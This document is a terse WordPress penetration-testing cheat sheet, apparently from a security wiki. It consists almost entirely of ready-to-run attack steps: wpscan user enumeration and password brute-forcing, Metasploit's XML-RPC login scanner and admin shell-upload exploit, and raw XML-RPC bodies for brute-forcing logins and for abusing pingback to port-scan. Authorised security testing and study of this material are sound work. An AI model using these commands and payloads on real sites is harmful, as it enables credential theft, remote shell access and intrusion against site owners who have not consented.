๐Ÿดwordpress pentesting

Wordpress Pentesting

Enumeration

Wpscan

# Help menu
wpscan -h

# Non intrusive scan
wpscan --url <target-url>

# Plugins enumeration
wpscan --url www.example.com --enumerate p

# Users enumeration
wpscan --url www.example.com --enumerate u

Brute Force Attack

# Bruteforce users found using 50 threads
wpscan --url www.example.com --wordlist darkc0de.lst --threads 50

# Bruteforce on one user
wpscan --url www.example.com --wordlist darkc0de.lst --username admin

# Xmlrpc attack
wpscan --password-attack xmlrpc -U admin -P <password-wordlist> --url <target-url>

Metasploit

xmlrpc

# Start Metasploit
msfconsole

# Search wordpress modules
search type:auxiliary wordpress

# Use xmlrpc module
use auxiliary/scanner/http/wordpress_xmlrpc_login

# Show options
show options

# Run
run

Shell Upload

# Start Metasploit
msfconsole

# Search for shell_upload module
search shell_upload

# Use module
use exploit/unix/webapp/wp_admin_shell_upload

# Show the available options
show options

# Run
run

XML-RPC Attack

xmlrpc.php

http://<targetWebSite.com>/<wordpress directory>/xmlrpc.php

Send a POST request and list all the available methods

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Bruteforce login

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

XSPA or simply port scanning

pingback.ping

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

References

PreviousSensitive Data Exposure Cheat SheetNextxxe attack

Last updated